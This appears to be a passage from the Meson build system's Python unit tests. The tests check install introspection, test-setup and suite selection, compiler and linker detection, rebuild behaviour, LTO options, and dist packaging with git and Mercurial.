self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '60 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
'new_directory': 'share/new_directory',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '141 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '60 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
def read_logs():
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
return list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
logged = read_logs()
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
# Verify that with --dry-run we obtain the same logs but with nothing
# actually installed
windows_proof_rmtree(self.installdir)
self._run(self.meson_command + ['install', '--dry-run', '--destdir', self.installdir], workdir=self.builddir)
self.assertEqual(logged, read_logs())
self.assertFalse(os.path.exists(self.installdir))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_nopromote(self):
testdir = os.path.join(self.common_test_dir, '99 subproject subdir')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--wrap-mode=nopromote'])
self.assertIn('Dependency "subsub" not found', cm.exception.stdout)
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt'), encoding='utf-8') as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt'), encoding='utf-8') as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
# Setup that does not define a wrapper works with --wrapper
self._run(self.mtest_command + ['--setup=timeout', '--wrapper', shutil.which('valgrind')])
# Setup that skips test works
self._run(self.mtest_command + ['--setup=good'])
with open(os.path.join(self.logdir, 'testlog-good.txt'), encoding='utf-8') as f:
exclude_suites_log = f.read()
self.assertFalse('buggy' in exclude_suites_log)
# --suite overrides add_test_setup(exclude_suites)
self._run(self.mtest_command + ['--setup=good', '--suite', 'buggy'])
with open(os.path.join(self.logdir, 'testlog-good.txt'), encoding='utf-8') as f:
include_suites_log = f.read()
self.assertTrue('buggy' in include_suites_log)
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt'), encoding='utf-8') as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt'), encoding='utf-8') as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt'), encoding='utf-8') as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
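# Relies on `meson test` exiting with the number of failed tests as its
# return code; an expected count of zero means the command must succeed.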
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '130 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '131 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl. This can be either an
# ld-like linker or a link.exe-like linker (usually the
# former for msys2, the latter otherwise)
self.assertIsInstance(cc.linker, (mesonbuild.linkers.MSVCDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
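            # Hypothetically, the resulting value would look something like
            # CC='python3 ".../compiler wrapper.py" cc -DSOME_ARG' once each
            # part has been quoted, mimicking a compiler-launcher prefix.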
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
os.environ[evar] = ' '.join(quote_arg(w) for w in wrappercc)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
os.environ['AR'] = ' '.join(quote_arg(w) for w in wrapperlinker)
# Need a new env to re-run environment loading
env = get_fake_env(testdir, self.builddir, self.prefix)
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '134 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
                    raise AssertionError('{!r} found in c-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '133 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '110 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
        # Changing mtime of libfile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '58 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '91 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
@skip_if_not_base_option('b_lto_threads')
def test_lto_threads(self):
if is_cygwin():
raise unittest.SkipTest('LTO is broken on Cygwin.')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
extra_args: T.List[str] = []
if cc.get_id() == 'clang':
if is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
else:
extra_args.append('-D_cargs=-Werror=unused-command-line-argument')
self.init(testdir, extra_args=['-Db_lto=true', '-Db_lto_threads=8'] + extra_args)
self.build()
self.run_tests()
expected = set(cc.get_lto_compile_args(threads=8))
targets = self.introspect('--targets')
# This assumes all of the targets support lto
for t in targets:
for s in t['target_sources']:
for e in expected:
self.assertIn(e, s['parameters'])
@skip_if_not_base_option('b_lto_mode')
@skip_if_not_base_option('b_lto_threads')
def test_lto_mode(self):
testdir = os.path.join(self.common_test_dir, '6 linkshared')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() != 'clang':
raise unittest.SkipTest('Only clang currently supports thinLTO')
if cc.linker.id not in {'ld.lld', 'ld.gold', 'ld64', 'lld-link'}:
raise unittest.SkipTest('thinLTO requires ld.lld, ld.gold, ld64, or lld-link')
elif is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args=['-Db_lto=true', '-Db_lto_mode=thin', '-Db_lto_threads=8', '-Dc_args=-Werror=unused-command-line-argument'])
self.build()
self.run_tests()
expected = set(cc.get_lto_compile_args(threads=8, mode='thin'))
targets = self.introspect('--targets')
# This assumes all of the targets support lto
for t in targets:
for s in t['target_sources']:
self.assertTrue(expected.issubset(set(s['parameters'])), f'Incorrect values for {t["name"]}')
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init, _git_add_all)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
